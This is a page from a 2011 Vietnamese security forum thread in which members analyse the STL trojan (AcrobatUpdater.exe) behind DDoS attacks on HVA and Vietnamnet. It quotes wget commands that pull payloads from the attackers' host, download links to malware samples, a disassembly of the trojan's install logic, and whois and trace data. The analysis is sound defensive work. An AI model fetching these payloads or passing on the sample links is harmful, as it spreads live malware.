banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Phân tích tính chất vài trận DDoS HVA vừa qua.  XML
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 08:07:26 (+0700) | #511 | 245400
[Avatar]
sonngh
Member

[Minus]    0    [Plus]
Joined: 04/11/2010 01:10:40
Messages: 37
Location: Thiên đường
Offline
[Profile] [PM]

TQN wrote:

1. Tại sao có mấy file mạo danh của stl không có đuôi .exe, tui không double click vô thì làm sao nhiểm virus vô máy tui được ?
2. Nhiều file như StaticCaches.dat, uxtheme.manifest... là các DLL. Các DLL này làm sao tự run được ?
3. Nó download bmp về thì làm sao sinh ra bot mới được ?

 


a TQN xin cho e trích ngang bài viết này vì e đã đọc tới trang 17 rồi,nhưng vẫn chưa hiểu cách thức trên,em mong anh có 1 bài viết phân tích để e và các bạn khác nắm rõ hơn được không a ? vì e cũng là IT nhưng vẫn còn mù mờ về vấn đề này smilie
Cám ơn a !
Ordeal but No Failure !
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 10:52:48 (+0700) | #512 | 245405
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Từ từ mình sẽ post sau, mẫu của stl thì nhiều lắm, phân tích hoạt động của chỉ 1 file thôi đã mấy chục tấm hình rồi.

Bà con thân mến, sau khi second.dinest.com die, giờ stl lại nhảy qua Nhật, thuê webserver bên đó để đặt xc.jpg và xv.jpg:
Code:
wget -t3 "http://high.paploz.com/xv.jpg" -U"An0nym0453"
wget -t3 "http://high.paploz.com/xc.jpg" -U"An0nym0453"

Host high.paploz.com có IP: 46.166.147.48. Nhờ anh PXMMRF kiểm tra host này.
top.jpg, xc.jpg, xv.jpg được đặt lên webserver vào ngày 18-10-2011, 3h chiều.

File AcrobatUpdater.exe này có modify code một số, nhưng cơ bản vẫn là VB và các phương thức tấn công bằng HTTP protocol dùng socket.

File ngày 15-08-2011: http://www.mediafire.com/?vp9spwf2bnx7e5i
File ngày 20-08-2011: http://www.mediafire.com/?6qj9841rxvone83
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 12:25:23 (+0700) | #513 | 245407
[Avatar]
sonngh
Member

[Minus]    0    [Plus]
Joined: 04/11/2010 01:10:40
Messages: 37
Location: Thiên đường
Offline
[Profile] [PM]
Domain Name: PAPLOZ.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: www.enom.com
Name Server: NS1.AFRAID.ORG
Name Server: NS2.AFRAID.ORG
Name Server: NS3.AFRAID.ORG
Name Server: NS4.AFRAID.ORG
Status: clientTransferProhibited
Updated Date: 01-aug-2011
Creation date: 01 Aug 2011 08:59:00
Expiration date: 01 Aug 2012 00:59:00

IP Xem hình :



Công nhận nhóm này cũng chịu chơi thiệt .
Ordeal but No Failure !
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 13:27:42 (+0700) | #514 | 245410
phuongnvt
Member

[Minus]    0    [Plus]
Joined: 09/02/2011 03:35:39
Messages: 332
Offline
[Profile] [PM]
Reverse IP Domain Check


Found 2 domains hosted on the same web server as high.paploz.com (46.166.147.48).

high.paploz.com (linkback)

second.dinest.net (linkback)
 

who is hosting this

high.paploz.com
high.paploz.com Is Hosted by Santrex RU VPS Services

Hosting: Santrex RU VPS Services host the domain high.paploz.com
IP Address: 46.166.147.48

Visit Santrex RU VPS Services now
 


WHOIS

Visit AboutUs.org for more information about paploz.com
AboutUs: paploz.com


Domain name: paploz.com

Registrant Contact:
Whois Privacy Protection Service, Inc.
Whois Agent ()

Fax:
PMB 368, 14150 NE 20th St - F1
C/O paploz.com
Bellevue, WA 98007
US

Administrative Contact:
Whois Privacy Protection Service, Inc.
Whois Agent (yvrpwlywpp@whoisprivacyprotect.com)
+1.4252740657
Fax: +1.4259744730
PMB 368, 14150 NE 20th St - F1
C/O paploz.com
Bellevue, WA 98007
US

Technical Contact:
Whois Privacy Protection Service, Inc.
Whois Agent (yvrpwlywpp@whoisprivacyprotect.com)
+1.4252740657
Fax: +1.4259744730
PMB 368, 14150 NE 20th St - F1
C/O paploz.com
Bellevue, WA 98007
US

Status: Locked

Name Servers:
ns1.afraid.org
ns2.afraid.org
ns3.afraid.org
ns4.afraid.org

Creation date: 01 Aug 2011 08:59:00
Expiration date: 01 Aug 2012 00:59:00


Get Noticed on the Internet! Increase visibility for this domain name by listing it at www.whoisbusinesslistings.com
=-=-=-=
The data in this whois database is provided to you for information
purposes only, that is, to assist you in obtaining information about or
related to a domain name registration record. We make this information
available "as is," and do not guarantee its accuracy. By submitting a
whois query, you agree that you will use this data only for lawful
purposes and that, under no circumstances will you use this data to: (1)
enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or (2) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic
mail, or by telephone. The compilation, repackaging, dissemination or
other use of this data is expressly prohibited without prior written
consent from us.

We reserve the right to modify these terms at any time. By submitting
this query, you agree to abide by these terms.
Version 6.3 4/3/2002

Registrar: ENOM, INC.
Whois Server: whois.enom.com
Creation Date: 01-AUG-2011
Updated Date: 01-AUG-2011
Expiration Date: 01-AUG-2012

Nameserver: NS1.AFRAID.ORG
Nameserver: NS2.AFRAID.ORG
Nameserver: NS3.AFRAID.ORG
Nameserver: NS4.AFRAID.ORG
 


Visual Trace Route Tool

Host trace to
high.paploz.com
22 hops / 47.4 seconds


1. dreamhost.com
United States 2. dreamhost.com
United States 3. ntt.net
United States 4. ntt.net
United States 5. ntt.net
United States 6. ntt.net
United States 7. ntt.net
United States 8. ntt.net
United States 9. ntt.net
Germany 10. ntt.net
Belgium 11. edpnet.net
Belgium 12. edpnet.net
Belgium 13. edpnet.net
Belgium 14. edpnet.net
Belgium 15. edpnet.net
Russian Federation 16. westcall.ru
Russian Federation 17. 82.199.119.33
Russian Federation 18. 82.199.119.146
Russian Federation 19. cod-rt1.tel.ru
Russian Federation 20. iqhost.ru
France 21. santrex.net
22. 46.166.147.48
 
Nhiều người nhận được lời khuyên, song chỉ có những người khôn mới sử dụng lời khuyên đó


[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 13:33:58 (+0700) | #515 | 245411
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

PXMMRF wrote:


Quay lai trường hợp cụ thể của STL virus AcrobatUpdater.exe thì:

- Khi cài vào XP với quyền Admin 1 hoăc Admin 2 (Admin1 có khác Admin2 đấy nhé) thì AcrobatUpdater.exe được cài vào thư muc C/Program files/, như anh conmale đã viết.

- Khi cài vào XP với quyền Limited thì nó tự đông được cài vào một thư muc khác: thư muc của chính user ấy trong C/Documents and settings/ và vẫn tao ra registry, đủ để active. Xin minh hoạ bằng hình cụ thể (các bạn xem cho sướng con mắt mình. Hì hì)
 


Hôm nay rảnh rang, em coi kỹ lại thì đúng là bản XP SP3 em lấy từ CDE của công ty ra không phải là mặc định policies. Đây là bản "ghost" đã được điều chỉnh khá nhiều. Nó không cho phép người dùng bình thường chép thông tin vô c:\program files và cũng không cho user access registry.

Thử lại stl malware bằng account thường trên bản xp sp3 này thì quả thật nó tạo AcrobatUpdater.exe trong "Application Data" nhưng không thể thêm bớt gì trong registry hết.

Tóm lại, bolzano_1989 nhận xét đúng. Trên Windows XP (default), chạy bằng user bình thường vẫn có thể bị nhiễm stl malware. Malware này chỉ không nhiễm khi local policies được áp đặt cụ thể.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 14:53:00 (+0700) | #516 | 245414
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Không quan trọng đâu anh conmale. Code của stl luôn luôn check user có phải thuộc nhóm admin hay không.
Có: Chép vào %Program Files% hay %WinDir%, ghi vào HKLM.
Không: Chép vào %AppData% của user, ghi vào HKCU.
Cách code này xuyên suốt từ các con "mèo què" đầu tiên tới giờ.
Dưới đây là đoạn code phổ biến mà stl coder thường dùng trong các "trò mèo" (viết mèo què khó viết hơn) của stl:
Code:
.text:00401353         mov     [ebp+IsAdmin], ebx      ; ebx = 0
.text:00401359         mov     dword ptr [ebp+pIdentifierAuthority.Value], ebx
.text:0040135F         mov     word ptr [ebp+pIdentifierAuthority.Value+4], 500h ; Value[4] = 0; Value[5] = SECURITY_NT_AUTHORITY
.text:00401368         lea     eax, [ebp+pSid]
.text:0040136E         push    eax                     ; pSid
.text:0040136F         push    ebx                     ; nSubAuthority7 = 0
.text:00401370         push    ebx                     ; nSubAuthority6 = 0
.text:00401371         push    ebx                     ; nSubAuthority5 = 0
.text:00401372         push    ebx                     ; nSubAuthority4 = 0
.text:00401373         push    ebx                     ; nSubAuthority3 = 0
.text:00401374         push    ebx                     ; nSubAuthority2 = 0
.text:00401375         push    DOMAIN_ALIAS_RID_ADMINS ; nSubAuthority1
.text:0040137A         push    SECURITY_BUILTIN_DOMAIN_RID ; nSubAuthority0
.text:0040137C         push    2                       ; nSubAuthorityCount
.text:0040137E         lea     ecx, [ebp+pIdentifierAuthority]
.text:00401384         push    ecx                     ; pIdentifierAuthority
.text:00401385         call    ds:AllocateAndInitializeSid
.text:0040138B         mov     [ebp+IsAdmin], eax
.text:00401391         cmp     eax, ebx
.text:00401393         jz      short @@UserIsLimit
.text:00401395         lea     edx, [ebp+IsAdmin]
.text:0040139B         push    edx                     ; IsMember
.text:0040139C         mov     eax, [ebp+pSid]
.text:004013A2         push    eax                     ; SidToCheck
.text:004013A3         push    ebx                     ; TokenHandle
.text:004013A4         call    ds:CheckTokenMembership
.text:004013AA         test    eax, eax
.text:004013AC         jnz     short @@UserIsAdmin
.text:004013AE         mov     [ebp+IsAdmin], ebx
.text:004013B4 @@UserIsAdmin:                          ; CODE XREF: Infect+13Cj
.text:004013B4         mov     ecx, [ebp+pSid]
.text:004013BA         push    ecx                     ; pSid
.text:004013BB         call    ds:FreeSid
.text:004013C1         mov     eax, [ebp+IsAdmin]
.text:004013C7 @@UserIsLimit:                          ; CODE XREF: Infect+123j
.text:004013C7         push    ebx                     ; fCreate
.text:004013C8         lea     edx, [ebp+PathName]
.text:004013CE         mov     esi, ds:SHGetSpecialFolderPathW
.text:004013D4         cmp     eax, 1
.text:004013D7         jnz     @@NormalUser
.text:004013DD         push    CSIDL_PROGRAM_FILES     ; csidl
.text:004013DF         push    edx                     ; pszPath
.text:004013E0         push    ebx                     ; hwnd
.text:004013E1         call    esi ; SHGetSpecialFolderPathW
.text:004013E3         cmp     eax, 1
.text:004013E6         jnz     @@Return
.text:004013EC         push    ebx                     ; fCreate
.text:004013ED         push    CSIDL_PROGRAM_FILES     ; csidl
.text:004013EF         lea     eax, [ebp+FileName]
.text:004013F5         push    eax                     ; pszPath
.text:004013F6         push    ebx                     ; hwnd
.text:004013F7         call    esi ; SHGetSpecialFolderPathW
.text:004013F9         cmp     eax, 1
.text:004013FC         jnz     @@Return
.text:00401402         lea     ecx, [ebp+pMore]
.text:00401408         mov     edx, offset szSandboxie ; "Sandboxie"
.text:0040140D         call    Xor_5_Decode
.text:00401412         cmp     eax, 1
.text:00401415         jnz     @@Return
.text:0040141B         lea     ecx, [ebp+var_A44]
.text:00401421         mov     edx, offset szSbieSvc_exe ; "SbieSvc.exe"
.text:00401426         call    Xor_5_Decode
.text:0040142B         cmp     eax, 1
.text:0040142E         jnz     @@Return
.text:00401434         lea     ecx, [ebp+var_83C]
.text:0040143A         mov     edx, offset szSbieMgm_dll ; "SbieMgm.dll"
.text:0040143F         call    Xor_5_Decode
.text:00401444         cmp     eax, 1
.text:00401447         jnz     @@Return
.text:0040144D         lea     ecx, [ebp+pMore]
.text:00401453         push    ecx                     ; pMore
.text:00401454         lea     edx, [ebp+PathName]
.text:0040145A         push    edx                     ; pszPath
.text:0040145B         mov     edi, PathAppendW
.text:00401461         call    edi ; PathAppendW

Từ thời còn WinNT4, 2000, mấy cái hàm AllocateAndInitializeSid, CheckTokenxxx... là em đã code rồi, thời còn help = WinHelp kìa, bởi vậy em nhìn là thấy ngay smilie
Các hàm quen thuộc mà stl coder thường dùng là memset, memcpy, SHGetSpecialFolderPath..., fread, fwrite, fseek (dùng nhiều nhất cho lấy kích thước - size của file)...

PS: Tới hiện nay em vẫn chưa có mẩu đang ddos Vietnamnet và ddos hva với User-Agent string đặc biệt. Bà con tiếp tục nhé ! Những ai không vào blogspot của Gấu gồ được thì chắc chắn 100% là mạng các bạn đã dính bot và virus nằm vùng của stl.
2 sonngh: Không gọi là nhóm được đâu, theo tôi, phải gọi là phòng, ban hay cơ quan gì đó mới đúng ! Mấy anh stl lúc đầu rêu rao, hù doạ người ta là một nhóm "du học sinh", "du học sinh" cái con khỉ, "du côn sinh (ra)" thì có ! Em nói có phải không mấy anh stl ? Nội cái tên stl mấy anh mang lên người không còn bị vô số biến thể, nhiều hơn số biến thể trò mèo xxx của mấy anh rồi smilie

Thông thường, em hay disable KIS của em, khi cần quét mới quét. Lúc nãy vô tình enable KIS, wget thử images01.gif từ penop.net, KIS nhảy ra liền, ê, địa chỉ độc hại, tao cấm. Hì hì, vậy cũng được smilie
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 15:22:22 (+0700) | #517 | 245415
[Avatar]
Vanxuanemp
Member

[Minus]    0    [Plus]
Joined: 02/08/2005 04:31:37
Messages: 63
Location: Thôn Đoài
Offline
[Profile] [PM] [WWW]
@TQN: mãi không upload lên được medifire, thôi đành up lên hotfile vậy

http://hotfile.com/dl/127328046/43818c0/Unabletoverify.zip.html

anh xem giúp có file nào là nhiễm trojan không??
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 16:07:09 (+0700) | #518 | 245416
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

TQN wrote:
Từ từ mình sẽ post sau, mẫu của stl thì nhiều lắm, phân tích hoạt động của chỉ 1 file thôi đã mấy chục tấm hình rồi.

Bà con thân mến, sau khi second.dinest.com die, giờ stl lại nhảy qua Nhật, thuê webserver bên đó để đặt xc.jpg và xv.jpg:
Code:
wget -t3 "http://high.paploz.com/xv.jpg" -U"An0nym0453"
wget -t3 "http://high.paploz.com/xc.jpg" -U"An0nym0453"

Host high.paploz.com có IP: 46.166.147.48. Nhờ anh PXMMRF kiểm tra host này.
top.jpg, xc.jpg, xv.jpg được đặt lên webserver vào ngày 18-10-2011, 3h chiều.

File AcrobatUpdater.exe này có modify code một số, nhưng cơ bản vẫn là VB và các phương thức tấn công bằng HTTP protocol dùng socket.

File ngày 15-08-2011: http://www.mediafire.com/?vp9spwf2bnx7e5i
File ngày 20-08-2011: http://www.mediafire.com/?6qj9841rxvone83
 

Có đây TQN à.

high.paploz.com
Whois---> privacy protected

- IP 46.166.147.48
- Trên webserver chỉ hosting một website này (high.paploz.com)
- Web server (Trình quản lý website) NGINX 1.1.0 ( giống như các webserver khác của STL)
- Sử dụng các nameserver như các webserver khác của STL. Có vẻ như STL có mối liên quan chặt chẽ với công ty quản lý nameserver, hay có tay trong ở đây. Nên việc chuyển IP cho webserver (điều chỉnh Record A) thuận lơi và nhanh chóng hơn bình thường.
- Địa chỉ đặt webserver: NGA (Russian)
- Webserver mở cổng 80 TCP HTTP (webser được cài đặt vào khoảng 5,6-8-2011, mở ngày nào thì không rõ)

- File top.jpg đã bị removed (5.00PM 20-8-2011)

- File xv.jpg chỉ là 1 file .txt bình thường value của nó là: 2011-08-18 15:22:46
(Có lẽ đây là giờ tấn công vào một website nào đó? )

- File xc.jpg -đươc protected- nhờ TQN RCE giùm. Thanks
Xem visual route



Special Note: Chỉ là giỡn chơi. Đố các bạn trong hình visual route mà tôi post trên đây có chứa(embedded) cái gì. Nôi dung thế nào. Ai biết xin hậu tạ chầu bia. Chỉ là giỡn vui cho giảm stress chút ít thôi. Hì hì.
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 19:03:35 (+0700) | #519 | 245431
weasel1026789
Member

[Minus]    0    [Plus]
Joined: 25/06/2011 23:51:19
Messages: 10
Offline
[Profile] [PM]
Các bạn HVA nhiệt tình quá, kiểu này thì STL phải thâm hụt ngân quỹ nặng smilie
Có ai làm cái tổng kết xem STL đã tốn bao nhiêu tiền để mua domain mới kể từ khi bị phanh phui không nhỉ.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 19:20:34 (+0700) | #520 | 245432
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
U, ăn thua gì, mấy cái lẻ tẻ đó thì ăn thua với ngân quỹ của mấy anh stl. Mấy anh ấy tiền vô số, mà đâu phải tiền của mấy anh làm ra đâu mà sợ, phải không mấy anh ?
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 19:23:32 (+0700) | #521 | 245433
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]

TQN wrote:
Có: Chép vào %Program Files% hay %WinDir%, ghi vào HKLM.
Không: Chép vào %AppData% của user, ghi vào HKCU.  

Nhiêu đây công đoạn lây lan là Đủ để bất kỳ thứ gì chạy được trên windows.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 22:40:43 (+0700) | #522 | 245441
phanledaivuong
Member

[Minus]    0    [Plus]
Joined: 23/05/2008 17:34:21
Messages: 315
Location: /dev/null
Offline
[Profile] [PM] [WWW]

weasel1026789 wrote:
Các bạn HVA nhiệt tình quá, kiểu này thì STL phải thâm hụt ngân quỹ nặng smilie
Có ai làm cái tổng kết xem STL đã tốn bao nhiêu tiền để mua domain mới kể từ khi bị phanh phui không nhỉ. 


Theo mình nghĩ bọn Sờ Ti Lợn này đã dùng nhiều trò ăn cắp email và tài khoản cá nhân của mọi người trên Internet thì kiểu gì chúng nó cũng dùng "Credit Card chùa" để mua sắm Domain.

Quá khứ ở Đức cho thấy rất nhiều người đã liều chết để trèo qua tường Berlin từ Đông sang Tây nhiều lắm. ngày nay bọn Sờ Ti Lợn này lại muốn ở bên phía đông thành lợn cho tụi nó sờ ti đây mà smilie. sang phía tây cái là Sờ Ti Lợn chắc là đi sờ ty nhau smilie Không nên cố giữ những gì sắp lụi tàn ... nó là vòng luân hồi rồi ... Khi bức tường được phá để tất cả thành phía tây thì lúc đấy mấy con Sờ Ti Lợn này sẽ bị cắt tiết hết.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 22:47:55 (+0700) | #523 | 245442
[Avatar]
.lht.
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 10:06:38
Messages: 75
Location: Inside you
Offline
[Profile] [PM]
Không có sài chùa đâu bạn smilie)
Nếu như theo dõi các reply của mọi người, chắc hẳn ai cũng nhận ra STL là 1 tổ chức lớn và không đơn giản, có được hỗ trợ lớn về nhiều mặt. Vậy tại sao phải dùng CC chùa ? Mà đã là "tổ chức lớn" thì ai lại động đến CC chùa nhỉ ?
Trash from trash is the place for new good things ~
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 20/08/2011 23:08:17 (+0700) | #524 | 245444
[Avatar]
.lht.
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 10:06:38
Messages: 75
Location: Inside you
Offline
[Profile] [PM]
@TQN: Liệu trong những virus của STL có sử dụng những kĩ thuật nâng quyền, ring0 Access, ... không anh ? Hay nói cách khác là virus của STL can thiệp đến mức độ nào vào hệ thống rùi ạ ?
Trash from trash is the place for new good things ~
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 00:02:58 (+0700) | #525 | 245445
phanledaivuong
Member

[Minus]    0    [Plus]
Joined: 23/05/2008 17:34:21
Messages: 315
Location: /dev/null
Offline
[Profile] [PM] [WWW]

.lht. wrote:
Không có sài chùa đâu bạn smilie)
Nếu như theo dõi các reply của mọi người, chắc hẳn ai cũng nhận ra STL là 1 tổ chức lớn và không đơn giản, có được hỗ trợ lớn về nhiều mặt. Vậy tại sao phải dùng CC chùa ? Mà đã là "tổ chức lớn" thì ai lại động đến CC chùa nhỉ ? 


Tổ chức lớn có 2 loại bạn ạ: Tổ chức sạch và bẩn.
Tổ chức bẩn thì chắc chắn sẽ dùng tiền bẩn.

STL khi reg đều cần phải giấu kín thông tin về mình. thứ nhất là sẽ sử dụng các dịch vụ private information của các nhà cung cấp hosting và domain. thứ 2 là nhờ 1 người khác đứng tên, nhưng cả 2 cách này có vẻ không an toàn cho lắm. cách an toàn nhất và hay nhất là sử dụng 1 thằng mà nó không biết mình và tội gì không dùng tiền nó luôn, bọn STL này dùng trò cắp password thì tha gì không xài luôn cc chùa. các dự án ở việt nam thường được mấy lão xếp tổng đưa và chi cho 1 đống tiền, rồi làm đi. cứ thấy có cái kết quả là được. mặc dù kết quả không cần biết là bệnh thành tích hay không smilie) vì vậy cái tổ chức này thì thằng sếp đầu đất cũng quang 1 cục tiền cho cái nhóm đấy. rồi chúng nó sẽ chia nhau tiêu tiền, xài cc chùa mua hosting với domain an toàn mà tiết kiện được 1 khoản để anh em trong nhóm chia chác nhau.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 00:30:45 (+0700) | #526 | 245447
[Avatar]
.lht.
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 10:06:38
Messages: 75
Location: Inside you
Offline
[Profile] [PM]
Phân tích rất hay, chuẩn với nhiều tổ chức !
Nhưng với STL thì mình cảm thấy ngược lại smilie Đơn giản mà, nếu dùng CC chùa để đăng kí máy chủ. Cứ cho là qua mặt được bước verify tài khoản và được phép sử dụng. Nhưng liệu trong quá trình sử dụng, với mục đich của STL thì khả năng bị block tài khoản rất lớn smilie

Mà đến tận bây giờ, nó vẫn live sờ sờ ra đó. Phải chăng máy chủ được đăng kí bằng tiền của họ mới đảm bảo như vậy ... ? smilie

Trash from trash is the place for new good things ~
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 00:37:06 (+0700) | #527 | 245448
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]
Tôi đã tìm ra file virus (process) hiện đang tấn công vào HVA

Process này mở rất nhiều và liên tục các thread (cổng TCP) kết nối- tấn công vào cổng 80 TCP của website HVA.
Nhịp độ tấn công khá mạnh, khoảng 5-6 kết nối trong một giây (với máy có cấu hình thấp, tốc độ CPU chậm-máy tôi đang thí nghiệm). Gói tin tấn công có dung lương từ 25-62 Bytes.

Quá trình tấn công này không thông qua trình duyệt mà từ process tấn công thẳng vào cổng 80 TCP của HVA webserver.

Ngay khi bị nhiễm vào máy process khởi phát tự động quá trình tấn công và cũng tự kích hoat khi máy khởi đông lại.
Tuy vẫn dùng tên file (process) cũ, là AcrobatUpdater.exe, nhưng đây lai là file có cấu trúc mới. Chúng hoàn toàn không bị Avira antivirus phát hiện khi đươc cài vào máy và ngay cả khi scan thẳng vào file.
(AcrobatUpdater.exe cũ - TQN cung cấp vào khoảng 28-7-2011 và 5-8-2011 bị Avira Antivirus phát hiện dễ dàng)

File virus này có tên là "AcrobatUpdater_20_08_2011" (theo anh TQN đặt lúc upload lên mạng)

Có lẽ đây cũng là file (process) vừa mới đây tấn công DDoS vào vietnamnet.net















The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 08:47:52 (+0700) | #528 | 245458
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]
Theo thông lệ quốc tế, HVA chúng tôi đặt tên trojạn này là TRJ/hvadetec-1
(Xin anh conmale và TQN góp ý thêm)

Virus-Trojan do các hacker mũ đen bất kỳ, nào đó tạo ra và gây lây nhiễm trên mạng (trường hợp này là STL), tổ chức phát hiện đầu tiên ra nó và tư vấn cách diệt nó trong hệ thống máy, có quyền đặt tên cho nó.

Trân trọng đề nghi các công ty Antivius, đăc biệt là các công ty VN tôn trọng thông lệ này.


Xin anh TQN và acoutic...RCE kỹ nó và tư vấn cách diệt đơn giản, hiệu quả nhất mà một user thông thường có thể áp dụng. Nên viết một "Virus-Trojan Removal tool" nhỏ để diệt con này và có thể cả các trojan-virus khác của STL và phổ biến trên mạng

Chúng tôi (conmale, TQN và tôi) đang tiếp tục tìm hiểu thêm về Trojan đang tấn công vào vietnamnet.net, tờ báo mạng chúng tôi có cảm tình
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 08:56:50 (+0700) | #529 | 245459
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Nó không mới đâu anh PXM. Vẫn là AcrobatUpdater.exe cũ, được down về từ http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh !

Vấn đề quan trọng bây giờ là tìm ra mẫu đang ddos Vietnamnet, tìm ra cái C&C webserver giấu mặt này của bọn stl.

Các bạn đừng sợ, ngại ngùng gì cả, các bạn chỉ tìm mẫu, up mẫu thì mắc mớ cái gì phải sợ, sợ stl, sợ pháp luật à ? Pháp luật nào cấm các bạn tham gia HVA forum, cấm tham gia thảo luận, RCE virus, cấm tìm và up mẫu virus ?????

Tôi nói vậy vì có nhiều bạn PM, mail cho tui để gởi mẫu, nhưng lại sợ tôi nói ra nick HVA, mail address của các bạn. Dĩ nhiên là tôi sẽ làm theo yêu cầu của các bạn. Nhưng tôi lại ngạc nhiên, sao lại phải sợ, tôi, anh PXMMRF, accourics.... và nhiều anh em HVA trong nước không sợ thì tại sao các bạn lại sợ ????????

2 .lht.: Trò mèo của stl chỉ ở mức user mode, code = C/C++ & VB, hoạt động bình thường ở mức user mode như các app bình thường khác. Coder của stl chưa dùng 1 kỹ thuật pure ASM tiên tiến nào mà giới virus writer thế giới đang dùng, và cũng chưa đụng tới kernel driver. Khi nào tụi nó đụng tới rootkit tui sẽ post phân tích. Đang luyện lại SoftIce và WinDbg để chuẩn bị debug rootkit của mấy anh stl, bỏ lâu lụt nghề rồi.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 11:01:44 (+0700) | #530 | 245466
kutruoi
Locked

[Minus]    0    [Plus]
Joined: 15/08/2011 12:47:31
Messages: 22
Offline
[Profile] [PM]

TQN wrote:
Nó không mới đâu anh PXM. Vẫn là AcrobatUpdater.exe cũ, được down về từ http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh !

[/b][/color]
 


@TQN : anh ơi, nếu như version cũ của con trojan AcrobatUpdater.exe chưa được đặt tên, và anh PXMMFX đã đặt tên cho phiên bản mới version 2, của con này thì theo em vẫn được xem là tên của một thể Trojan mới mà derivative từ phiên bản cũ mà.

đương nhiên là bọn sư tổ lợn này sẽ chỉ biến thể , và phát triển những con malware này trên nền tảng những con đầu tiên chúng ị ra mà thôi, vì trí tuệ chúng có thế thôi mà hì hì . còn trong danh sách đó vẫn còn một con mà đang ddogs vietnamnet giấu mặt hả anh ??? thế thì fia' Vietnamet Admins phải có những nghiên cứu từ các nguồn dos và kết hợp với các anh mà tìm ra chứ nhỉ ?

chúc anh một ngay happy day
mời bạn ghé xem site này hay quá ! http://danlambaovn.blogspot.com
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 21/08/2011 11:33:07 (+0700) | #531 | 245467
[Avatar]
tranvanminh
HVA Friend

Joined: 04/06/2003 06:36:35
Messages: 516
Location: West coast
Offline
[Profile] [PM]

TQN wrote:
